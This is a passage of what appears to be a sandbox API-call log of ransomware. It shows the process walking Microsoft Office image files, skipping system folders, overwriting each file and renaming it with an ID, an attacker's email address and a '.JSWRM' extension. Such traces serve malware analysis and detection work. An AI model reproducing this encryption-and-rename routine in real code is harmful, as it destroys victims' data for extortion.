Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.482] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.scale-100.png", cAlternateFileName="EX3CF4~1.PNG")) returned 1 [0132.482] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2=".") returned 1 [0132.482] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="..") returned 1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="...") returned 1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="windows") returned -1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="recovery") returned -1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="perflogs") returned -1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="system volume information") returned -1 [0132.483] lstrcmpiW (lpString1="ExcelLogoSmall.scale-100.png", lpString2="msocache") returned -1 [0132.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 28 [0132.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-100.png", cchWideChar=28, lpMultiByteStr=0x2413a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 28 [0132.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.484] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1949) returned 1 [0132.484] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.484] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0132.486] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.486] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0132.486] CloseHandle (hObject=0x238) returned 1 [0132.486] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.487] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x870, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.scale-140.png", cAlternateFileName="EX3590~1.PNG")) returned 1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2=".") returned 1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="..") returned 1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="...") returned 1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="windows") returned -1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="recovery") returned -1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="perflogs") returned -1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="system volume information") returned -1 [0132.487] lstrcmpiW (lpString1="ExcelLogoSmall.scale-140.png", lpString2="msocache") returned -1 [0132.487] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 28 [0132.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-140.png", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 28 [0132.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.488] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2160) returned 1 [0132.489] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.489] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x870, lpOverlapped=0x0) returned 1 [0132.490] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.490] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x870, lpOverlapped=0x0) returned 1 [0132.490] CloseHandle (hObject=0x238) returned 1 [0132.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.492] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1992206f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1992206f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1992206f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa67, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.scale-180.png", cAlternateFileName="EXE70C~1.PNG")) returned 1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2=".") returned 1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="..") returned 1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="...") returned 1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="windows") returned -1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0132.492] lstrcmpiW (lpString1="ExcelLogoSmall.scale-180.png", lpString2="msocache") returned -1 [0132.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x2413a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 28 [0132.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0132.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 28 [0132.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.493] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2663) returned 1 [0132.493] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.493] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa60, lpOverlapped=0x0) returned 1 [0132.495] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.495] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa60, lpOverlapped=0x0) returned 1 [0132.495] CloseHandle (hObject=0x238) returned 1 [0132.495] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.496] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6a3, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="ExcelLogoSmall.scale-80.png", cAlternateFileName="EX97E8~1.PNG")) returned 1 [0132.498] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2=".") returned 1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="..") returned 1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="...") returned 1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="windows") returned -1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0132.499] lstrcmpiW (lpString1="ExcelLogoSmall.scale-80.png", lpString2="msocache") returned -1 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 27 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x2413a8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 27 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.500] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1699) returned 1 [0132.500] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.500] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x6a0, lpOverlapped=0x0) returned 1 [0132.508] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.509] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x6a0, lpOverlapped=0x0) returned 1 [0132.509] CloseHandle (hObject=0x238) returned 1 [0132.509] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\ExcelLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\excellogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.511] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198fbe19, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198fbe19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="FirstRunLogo.contrast-black_scale-100.png", cAlternateFileName="FIRSTR~4.PNG")) returned 1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0132.511] lstrcmpiW (lpString1="FirstRunLogo.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0132.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0132.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0132.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FirstRunLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FirstRunLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0132.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.512] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1819) returned 1 [0132.512] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.512] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x710, lpOverlapped=0x0) returned 1 [0132.514] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.514] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x710, lpOverlapped=0x0) returned 1 [0132.514] CloseHandle (hObject=0x238) returned 1 [0132.514] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\firstrunlogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\FirstRunLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 